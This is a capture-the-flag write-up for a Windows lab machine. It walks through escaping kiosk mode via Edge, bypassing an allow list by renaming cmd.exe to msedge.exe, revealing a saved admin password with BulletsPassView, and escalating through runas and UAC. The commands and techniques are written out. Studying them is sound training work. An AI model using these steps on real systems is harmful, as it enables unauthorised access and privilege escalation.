VulnEscape

VulnEscape starts with only one open TCP port, remote desktop. I’ll connect and find a kiosk account that doesn’t require a password. On logging in, I’m presented with a full screen image and not much else. I’ll escape kiosk mode by opening Edge, and using it to access the file system. There I’ll download cmd.exe to the downloads directory, and rename it to msedge.exe to bypass named-based allow lists. With a shell, I’ll find a Remote Desktop Plus session file. I’ll load it into the application, and use BulletPassView to see the password under the obfuscated dots. With an admin password, I’ll use runas to get a shell, but it’s limited by UAC, which I’ll bypass to get full admin access. And for an interesting twist, the entire box is in Korean. In Beyond Root, I’ll set the language back to English and explore the Kiosk mode settings.

Box Info

Name VulnEscape VulnEscape
Play on HackTheBox
Release Date 08 Jul 2025
Retire Date 08 Jul 2025
OS Windows Windows
Base Points Easy [20]
First Blood User N/A (non-competitive)
First Blood Root N/A (non-competitive)
Creator xct

Recon

Initial Scanning

nmap finds a single open TCP port, RDP (3389):

oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.234.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-06 19:31 UTC
...[snip]...
Nmap scan report for 10.129.234.51
Host is up, received echo-reply ttl 127 (0.15s latency).
Scanned at 2025-07-06 19:31:40 UTC for 14s
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON
3389/tcp open  ms-wbt-server syn-ack ttl 127

Nmap done: 1 IP address (1 host up) scanned in 15.32 seconds
           Raw packets sent: 131082 (5.768MB) | Rcvd: 9 (380B)
oxdf@hacky$ nmap -p 3389 -sCV 10.129.234.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-06 19:35 UTC
Nmap scan report for 10.129.234.51
Host is up (0.089s latency).

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: ESCAPE
|   NetBIOS_Domain_Name: ESCAPE
|   NetBIOS_Computer_Name: ESCAPE
|   DNS_Domain_Name: Escape
|   DNS_Computer_Name: Escape
|   Product_Version: 10.0.19041
|_  System_Time: 2025-07-06T19:59:33+00:00
| ssl-cert: Subject: commonName=Escape
| Not valid before: 2025-04-10T06:20:36
|_Not valid after:  2025-10-10T06:20:36
|_ssl-date: 2025-07-06T19:59:37+00:00; +23m44s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 23m43s, deviation: 0s, median: 23m43s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds

This is clearly a Windows but, but there’s no evidence of Active Directory at this point.

RDP - TCP 3389

The only open port is remote desktop (RDP), which typically requires credentials. I’ll connect with xfreerdp /v:10.129.234.51 /dynamic-resolution +clipboard -sec-nla, and the resulting window shows a Windows PC in Kiosk mode:

image-20250706160308341

The note says to login as KioskUser0 with no password. I can verify these creds with netexec:

oxdf@hacky$ netexec rdp 10.129.234.51 -u KioskUser0 -p ''
RDP         10.129.234.51   3389   ESCAPE           [*] Windows 10 or Windows Server 2016 Build 19041 (name:ESCAPE) (domain:Escape) (nla:False)
RDP         10.129.234.51   3389   ESCAPE           [+] Escape\KioskUser0: (Pwn3d!)

Clicking the button over RDP opens a login screen, where I’ll use those creds:

image-20250706160501231

It works, and loads an image:

image-20250706160930740

This is likely some kind of Kiosk mode where it is showing full screen this image or website.

Kiosk Escape

Launch Edge

Clicking around doesn’t seem to have any impact on the system. However, when I push the Windows key, it pops the start menu:

image-20250706161504666

If I search for “cmd”, it does load, but clicking it doesn’t do anything:

image-20250706164406181

PowerShell behaves the same way.

I’ll type “edge”, and it brings up Edge:

image-20250706161535084

There are some configuration pages in a language I don’t speak, but after clicking around to get through them, I’ve got a full Edge page:

image-20250706161618069

Access Filesystem

I’ll enter “C:” as the URL, and it loads a file browser:

image-20250706161702354

I’ll find user.txt on the KioskUser0 user’s desktop:

image-20250706161841708

Shell

Download cmd.exe

I’ll head into C:\Windows\System32 and find cmd.exe. Clicking on it, it is downloaded to this user’s Downloads folder:

image-20250706171150989

Clicking the folder icon opens File Explorer:

image-20250706171219186

Run cmd.exe

Double-clicking this pops an error:

image-20250706171259322

If I give that image to an AI (in this case Perplexity), it translates for me:

image-20250706171409146

The restricted files could be identified many ways. One way would be by name. I’ll rename the binary from cmd.exe to 0xdf.exe, but the same issue:

image-20250706171501949

This suggests that the block is an allow list, rather than a block list. I know that Edge is allowed to run, so I’ll try renaming the binary to msedge.exe, and it opens!

image-20250706171558756

I can run powershell to switch to PowerShell as well:

image-20250706171644949

Shell as admin

Enumeration

Home Directories

There’s not much interesting in the KioskUser0 user’s home directory:

PS C:\Users\kioskUser0> tree /f .
Folder PATH listing
Volume serial number is 00000040 4A4B:52B4
C:\USERS\KIOSKUSER0
├───3D Objects
├───Contacts
├───Desktop
│       Microsoft Edge.lnk
│       user.txt
│
├───Documents
├───Downloads
│       msedge.exe
│
├───Favorites
├───Links
│       Desktop.lnk
│       Downloads.lnk
│
├───Music
├───Pictures
│   ├───Camera Roll
│   └───Saved Pictures
├───Saved Games
├───Searches
└───Videos

There’s nothing else of interest that’s accessible in C:\Users.

Filesystem Root

At the root of C:, it shows only very standard folders:

PS C:\> ls

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          2/3/2024   3:11 AM                inetpub
d-----         12/7/2019   1:14 AM                PerfLogs
d-r---         4/10/2025  11:29 PM                Program Files
d-r---          2/3/2024   3:03 AM                Program Files (x86)
d-r---          2/3/2024   3:43 AM                Users
d-----         6/24/2025   1:24 PM                Windows

However, I’ll recall from browsing this with Edge there were more directories. I’ll look for hidden folders:

PS C:\> ls -force

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d--hs-          2/4/2024  12:52 AM                $Recycle.Bin
d--h--         6/24/2025   8:23 AM                $WinREAgent
d--hsl          2/3/2024  11:32 AM                Documents and Settings
d-----          2/3/2024   3:11 AM                inetpub
d-----         12/7/2019   1:14 AM                PerfLogs
d-r---         4/10/2025  11:29 PM                Program Files
d-r---          2/3/2024   3:03 AM                Program Files (x86)
d--h--         6/24/2025   8:06 AM                ProgramData
d--hs-         10/1/2024  11:40 PM                Recovery
d--hs-         6/16/2025   4:42 AM                System Volume Information
d-r---          2/3/2024   3:43 AM                Users
d-----         6/24/2025   1:24 PM                Windows
d--h--          2/3/2024   3:05 AM                _admin
-a-hs-          2/4/2024   1:35 AM           8192 DumpStack.log
-a-hs-          7/6/2025  12:56 PM           8192 DumpStack.log.tmp
-a-hs-         10/1/2024  11:48 PM     2093002752 hiberfil.sys
-a-hs-          7/6/2025  12:56 PM     1476395008 pagefile.sys
-a-hs-          7/6/2025  12:56 PM       16777216 swapfile.sys

Most of this is typical stuff, but _admin is interesting.

PS C:\_admin> ls

    Directory: C:\_admin

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          2/3/2024   3:04 AM                installers
d-----          2/3/2024   3:05 AM                passwords
d-----          2/3/2024   3:05 AM                temp
-a----          2/3/2024   3:03 AM              0 Default.rdp
-a----          2/3/2024   3:04 AM            574 profiles.xml

The installers and passwords directories are both empty. profiles.xml has a information about a user named admin:

<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
  <Profile>
    <ProfileName>admin</ProfileName>
    <UserName>127.0.0.1</UserName>
    <Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
    <Secure>False</Secure>
  </Profile>
</Data>

This file is meant to be used with Remote Desktop Plus.

There is an admin user on this machine:

PS C:\> net user

User accounts for \\ESCAPE

-------------------------------------------------------------------------------
admin                    Administrator            DefaultAccount
Guest                    kioskUser0               WDAGUtilityAccount
The command completed successfully.

Remote Desktop Plus

There isn’t too much of interest installed in C:\Program Files or C:\Program Files (x86). The one thing that jumps out is Remote Desktop Plus:

PS C:\Program Files (x86)> ls

    Directory: C:\Program Files (x86)

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         12/7/2019   1:31 AM                Common Files
d-----         6/24/2025   1:19 PM                Internet Explorer
d-----          2/3/2024   3:14 AM                Microsoft
d-----         12/7/2019   1:31 AM                Microsoft.NET
d-----          2/3/2024   3:03 AM                Remote Desktop Plus
d-----         6/24/2025  10:10 AM                Windows Defender
d-----          2/3/2024   3:07 AM                Windows Mail
d-----         6/24/2025  10:10 AM                Windows Media Player
d-----         6/24/2025   1:19 PM                Windows Multimedia Platform
d-----         12/7/2019   1:50 AM                Windows NT
d-----         6/24/2025  10:10 AM                Windows Photo Viewer
d-----         6/24/2025   1:19 PM                Windows Portable Devices
d-----         12/7/2019   1:31 AM                WindowsPowerShell

I’ll run it:

PS C:\Program Files (x86)\Remote Desktop Plus> .\rdp.exe

The program opens:

image-20250706173758359

Recover Admin Password

Load Profile

Clicking on “Manage Profiles…” opens a view for profiles:

image-20250706174133803

I’ll try to import a profile:

image-20250706174150933

Unfortunately, the explorer that opens to pick the file won’t go back to the root of C:. From PowerShell, I’ll copy it to the Downloads directory:

PS C:\> copy C:\_admin\profiles.xml C:\Users\kioskUser0\Downloads\

Now I can open it for import:

image-20250706174302897

And it shows up as a profile:

image-20250706174322238

View Obfuscated Password

Unfortunately for me, the password is obfuscated by bullets. Double-clicking to edit the profile shows the same:

image-20250706174732982

If I try to copy the password, it pops another error in Korean:

image-20250706174800369

It is not allowed to copy form the password field:

image-20250706174838122

BulletsPassView

There’s a utility named BulletsPassView from NirSoft that will show what characters are hidden behind bullets on a Windows system.

I’ll download it from the website and unzip the result, giving BulletsPassView.exe. I’ll start a SMB server on my host:

oxdf@hacky$ smbserver.py share $(pwd) -smb2support -username oxdf -password oxdf
/home/oxdf/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

On VulnEscape, I’ll mount the share, copy the file over, and run it:

PS C:\> net use \\10.10.14.79\share /u:oxdf oxdf
The command completed successfully.

PS C:\> copy \\10.10.14.79\share\BulletsPassView.exe C:\Users\kioskUser0\Downloads\

PS C:\> C:\Users\kioskUser0\Downloads\BulletsPassView.exe

It opens up, detects the running windows, and shows the password:

image-20250706175736394

Low Priv Shell

RDP Fail

I can try to log in with RDP with the new creds, but it doesn’t work:

image-20250707065922766

Perplexity translates that to:

To log in remotely, you must have permission to log in through Remote Desktop Services. By default, members of the Remote Desktop Users group have this permission. If the group you currently belong to does not have this permission, or if this permission has been removed from the Remote Desktop Users group, you must be granted this permission manually.

This is surprising as admin is in the Administrators group:

PS C:\> net user admin
User name                    admin
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/3/2024 3:45:01 AM
Password expires             Never
Password changeable          2/3/2024 3:45:01 AM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   4/10/2025 11:26:42 PM

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.

VulnEscape must be configured to not allow with only Administrators group.

Runas

Regardless, I can still use runas to run a new command as admin:

PS C:\> runas /user:admin powershell
Enter the password for admin:
Attempting to start powershell as user "ESCAPE\admin" ...

A new window opens:

image-20250706180738582

This shell is missing the full Administrator privileges:

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

It must be UAC that’s blocking.

UAC Bypass

With GUI access, a quick way to bypass UAC is to run start-process powershell.exe -verb runas. This pops the interactive UAC dialog:

image-20250706181001985

Perplexity AI translates:

image-20250706181040709

I’ll click yes and a blue PowerShell window opens:

image-20250706181123245

This shell has full privs:

PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled

The flag is on the Administrator user’s desktop:

PS C:\Users\Administrator\Desktop> type root.txt
d46ea343************************

Beyond Root

Language Settings

As KioskUser0, in addition to Edge, I’m also able to open the Settings Window:

image-20250707160017084

If I search for “language”, there are several options:

image-20250707160107843

The top option loads the language settings:

image-20250707160135761

Setting it to English pops an error that say I must logout and back on again:

image-20250707160157634

In a terminal, I’ll run logoff, and then reconnect with RDP. There is still some Korean, but a lot of stuff is in English now. For example, the settings application in the start menu:

image-20250707160507968

And the settings:

image-20250707160528549

Kiosk Mode

In settings, I’ll search for Kiosk, but there’s nothing there:

image-20250707160612106

This is because KioskUser0 has no permissions to access this setting. From my privileged shell, I’ll add the KioskUser0 user to the Administrators group:

PS C:\> net localgroup administrators /add KioskUser0
The command completed successfully.

I’ll run logoff again, and reconnect RDP. Back in Settings, now there’s a Kiosk panel:

image-20250707160942635

It is setup to run Edge as the Kiosk user:

image-20250707161049809

The user shows Kiosk because that is the user’s full name:

C:\Users\kioskUser0\Downloads>net user kioskuser0
User name                    kioskUser0
Full Name                    Kiosk
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            7/7/2025 1:41:28 PM
Password expires             Never
Password changeable          7/7/2025 1:41:28 PM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/7/2025 1:24:37 PM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Desktop Users
                             *Users
Global Group memberships     *None
The command completed successfully.

It loads the website on localhost as a full screen application. This is what sets it so only msedge.exe can run under this user.